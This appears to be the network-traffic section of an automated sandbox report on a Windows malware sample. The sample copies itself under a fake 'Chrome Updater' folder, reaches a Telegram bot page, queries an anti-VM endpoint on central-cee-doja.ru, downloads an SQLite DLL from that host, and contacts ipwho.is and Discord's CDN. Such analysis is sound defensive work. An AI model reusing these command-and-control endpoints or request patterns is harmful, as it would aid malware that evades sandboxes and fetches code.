                                                                                    Jan 4, 2024 08:31:56.266365051 CET49996443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:56.266377926 CET44349996104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:56.458612919 CET44349995162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:31:56.458786011 CET44349995162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:31:56.458859921 CET49995443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:31:56.459517002 CET49995443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:31:56.741195917 CET44349996104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:56.741305113 CET44349996104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:56.741389036 CET49996443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:57.051758051 CET49996443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:57.059798956 CET49997443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:31:57.059832096 CET44349997162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:31:57.059942007 CET49997443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:31:57.060519934 CET49997443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:31:57.060534000 CET44349997162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:31:57.255326033 CET44349997162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:31:57.417105913 CET49997443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:31:57.417118073 CET44349997162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:31:57.544446945 CET44349997162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:31:57.544553995 CET44349997162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:31:57.544682980 CET49997443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:31:59.160825014 CET49997443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:31:59.241003036 CET49998443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:59.241034985 CET44349998104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:59.241097927 CET49998443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:59.242124081 CET49998443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:59.242140055 CET44349998104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:59.265604973 CET49999443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:59.265633106 CET44349999104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:59.265727997 CET49999443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:59.266370058 CET49999443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:59.266381979 CET44349999104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:59.446208000 CET44349998104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:59.449064970 CET49998443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:59.449084997 CET44349998104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:59.466794968 CET44349999104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:31:59.470415115 CET49999443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:31:59.470432043 CET44349999104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.145864964 CET44349998104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.145979881 CET44349998104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.146085024 CET49998443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.146595955 CET49998443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.147825956 CET50000443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.147866011 CET44350000104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.147964001 CET50000443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.148286104 CET50000443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.148297071 CET44350000104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.160829067 CET44349999104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.160938025 CET44349999104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.161010981 CET49999443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.161519051 CET49999443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.163052082 CET50001443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.163077116 CET44350001104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.163153887 CET50001443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.163499117 CET50001443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.163512945 CET44350001104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.346523046 CET44350000104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.349687099 CET50000443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.349704981 CET44350000104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.363713980 CET44350001104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.365319967 CET50001443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.365341902 CET44350001104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.825647116 CET44350000104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.825774908 CET44350000104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.825824976 CET50000443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.826431990 CET50000443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.831536055 CET50002443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:00.831574917 CET44350002162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.831631899 CET50002443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:00.831975937 CET50002443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:00.831998110 CET44350002162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.841161013 CET44350001104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.841336012 CET44350001104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.841387033 CET50001443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.841861010 CET50001443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:00.846389055 CET50003443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:00.846420050 CET44350003162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:00.846487999 CET50003443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:00.846839905 CET50003443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:00.846854925 CET44350003162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.026685953 CET44350002162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.028158903 CET50002443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:01.028182030 CET44350002162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.042224884 CET44350003162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.044096947 CET50003443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:01.044109106 CET44350003162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.280354977 CET44350002162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.280440092 CET44350002162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.280585051 CET50002443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:01.281078100 CET50002443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:01.299449921 CET44350003162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.299540043 CET44350003162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.299592972 CET50003443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:01.300112963 CET50003443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:01.390968084 CET50004443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:01.391002893 CET44350004104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.391073942 CET50004443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:01.391558886 CET50004443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:01.391571999 CET44350004104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.407486916 CET50005443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:01.407510996 CET44350005104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.407603979 CET50005443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:01.408030987 CET50005443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:01.408041954 CET44350005104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.590465069 CET44350004104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.607431889 CET44350005104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:01.685703039 CET50004443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:01.717057943 CET50005443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.016504049 CET50004443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.016519070 CET44350004104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:07.374310970 CET44350004104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:07.374429941 CET44350004104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:07.374475956 CET50004443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.374933958 CET50004443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.375466108 CET50006443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.375504017 CET44350006104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:07.375617981 CET50006443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.376023054 CET50006443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.376038074 CET44350006104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:07.575109005 CET44350006104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:07.576564074 CET50006443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.576586962 CET44350006104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:07.725874901 CET50005443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:07.725895882 CET44350005104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.080681086 CET44350005104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.080816031 CET44350005104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.080868959 CET50005443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.081199884 CET50005443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.081486940 CET50007443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.081525087 CET44350007104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.081737995 CET50007443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.081938028 CET50007443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.081959009 CET44350007104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.253201962 CET44350006104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.253282070 CET44350006104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.253341913 CET50006443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.253731966 CET50006443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.258986950 CET50008443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.259016991 CET44350008162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.259084940 CET50008443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.259536028 CET50008443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.259557962 CET44350008162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.277786970 CET44350007104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.279328108 CET50007443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.279340982 CET44350007104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.452663898 CET44350008162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.454250097 CET50008443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.454267979 CET44350008162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.726855040 CET44350008162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.726948977 CET44350008162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.727014065 CET50008443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.727396011 CET50008443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.746253014 CET44350007104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.746352911 CET44350007104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.746546984 CET50007443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.746835947 CET50007443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:32:08.748106956 CET50009443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.748145103 CET44350009162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.748282909 CET50009443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.748528957 CET50009443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.748553991 CET44350009162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.946338892 CET44350009162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:08.947915077 CET50009443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:08.947925091 CET44350009162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:09.208813906 CET44350009162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:09.208899975 CET44350009162.159.129.233192.168.2.6
                                                                                    Jan 4, 2024 08:32:09.208955050 CET50009443192.168.2.6162.159.129.233
                                                                                    Jan 4, 2024 08:32:09.209464073 CET50009443192.168.2.6162.159.129.233

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 4, 2024 08:29:54.537975073 CET6029653192.168.2.61.1.1.1
                                                                                    Jan 4, 2024 08:29:54.632715940 CET53602961.1.1.1192.168.2.6
                                                                                    Jan 4, 2024 08:29:55.862809896 CET5000653192.168.2.61.1.1.1
                                                                                    Jan 4, 2024 08:29:56.281277895 CET53500061.1.1.1192.168.2.6
                                                                                    Jan 4, 2024 08:30:05.593826056 CET6514353192.168.2.61.1.1.1
                                                                                    Jan 4, 2024 08:30:06.044676065 CET53651431.1.1.1192.168.2.6
                                                                                    Jan 4, 2024 08:30:15.913860083 CET5355653192.168.2.61.1.1.1
                                                                                    Jan 4, 2024 08:30:16.012043953 CET53535561.1.1.1192.168.2.6

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 4, 2024 08:29:54.537975073 CET192.168.2.61.1.1.10xcc23Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:29:55.862809896 CET192.168.2.61.1.1.10x511dStandard query (0)central-cee-doja.ruA (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:30:05.593826056 CET192.168.2.61.1.1.10x204eStandard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:30:15.913860083 CET192.168.2.61.1.1.10x65cfStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 4, 2024 08:29:54.632715940 CET1.1.1.1192.168.2.60xcc23No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:29:56.281277895 CET1.1.1.1192.168.2.60x511dNo error (0)central-cee-doja.ru104.21.89.193A (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:29:56.281277895 CET1.1.1.1192.168.2.60x511dNo error (0)central-cee-doja.ru172.67.164.142A (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:30:06.044676065 CET1.1.1.1192.168.2.60x204eNo error (0)ipwho.is15.204.213.5A (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:30:16.012043953 CET1.1.1.1192.168.2.60x65cfNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:30:16.012043953 CET1.1.1.1192.168.2.60x65cfNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:30:16.012043953 CET1.1.1.1192.168.2.60x65cfNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:30:16.012043953 CET1.1.1.1192.168.2.60x65cfNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                    Jan 4, 2024 08:30:16.012043953 CET1.1.1.1192.168.2.60x65cfNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • t.me
                                                                                    • central-cee-doja.ru
                                                                                    • ipwho.is
                                                                                    • cdn.discordapp.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.649711149.154.167.99803172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 4, 2024 08:29:54.821300030 CET64OUTGET /cinoshibot HTTP/1.1
                                                                                    Host: t.me
                                                                                    Connection: Keep-Alive
                                                                                    Jan 4, 2024 08:29:55.000050068 CET367INHTTP/1.1 301 Moved Permanently
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 04 Jan 2024 07:29:54 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 169
                                                                                    Connection: keep-alive
                                                                                    Location: https://t.me/cinoshibot
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.649750149.154.167.998027288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 4, 2024 08:30:24.892070055 CET64OUTGET /cinoshibot HTTP/1.1
                                                                                    Host: t.me
                                                                                    Connection: Keep-Alive
                                                                                    Jan 4, 2024 08:30:25.073126078 CET367INHTTP/1.1 301 Moved Permanently
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 04 Jan 2024 07:30:24 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 169
                                                                                    Connection: keep-alive
                                                                                    Location: https://t.me/cinoshibot
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.649712149.154.167.994433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:29:55 UTC64OUTGET /cinoshibot HTTP/1.1
                                                                                    Host: t.me
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:29:55 UTC511INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 04 Jan 2024 07:29:55 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 10856
                                                                                    Connection: close
                                                                                    Set-Cookie: stel_ssid=14da2c08ba43992cdc_6186783706098149869; expires=Fri, 05 Jan 2024 07:29:55 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                    Pragma: no-cache
                                                                                    Cache-control: no-store
                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                    2024-01-04 07:29:55 UTC10856INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 63 69 6e 6f 73 68 69 62 6f 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61
                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @cinoshibot</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.649713104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:29:56 UTC88OUTGET //antivm.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:29:56 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:29:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7Mjz1cfTpfShXvUUzMGMNUU0TCZdKoaKG%2BT6JjtQ5cwQQE%2F6K1rQ%2BwyD7YItWa3WeRCA60ZHHLBxLjlRDoXtFz3pqYuU8hlu6462XylxW%2ByGxVYohnVW8m0Lbgqo1xaA0XZtsk3c"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c5f928b27f9a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:29:56 UTC7INData Raw: 32 0d 0a 4e 4f 0d 0a
                                                                                    Data Ascii: 2NO
                                                                                    2024-01-04 07:29:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.649714104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:29:57 UTC72OUTGET /dlls/System.Data.SQLite.dll HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:29:57 UTC674INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:29:57 GMT
                                                                                    Content-Type: application/x-msdos-program
                                                                                    Content-Length: 393520
                                                                                    Connection: close
                                                                                    Last-Modified: Tue, 02 Nov 2021 17:44:02 GMT
                                                                                    ETag: "60130-5cfd1d6c67c80"
                                                                                    Accept-Ranges: bytes
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EH47H2c0s9nyTkdBm1%2FNyuesxUKPFRgMYxffDmRE%2F%2FG7HBkJCxqcb6bt2J0ujWOSdMgxpC3mZ4TDaxJkhLhTm6vtb9kQBmHCWQVZrIgjPNzz1nbtnA%2FLZofpIhYqTsBGa0fmo52M"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c5fd5f3781d6-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:29:57 UTC695INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 70 81 61 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 b6 05 00 00 08 00 00 00 00 00 00 a6 d3 05 00 00 20 00 00 00 e0 05 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 d9 86 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpa" 0 `
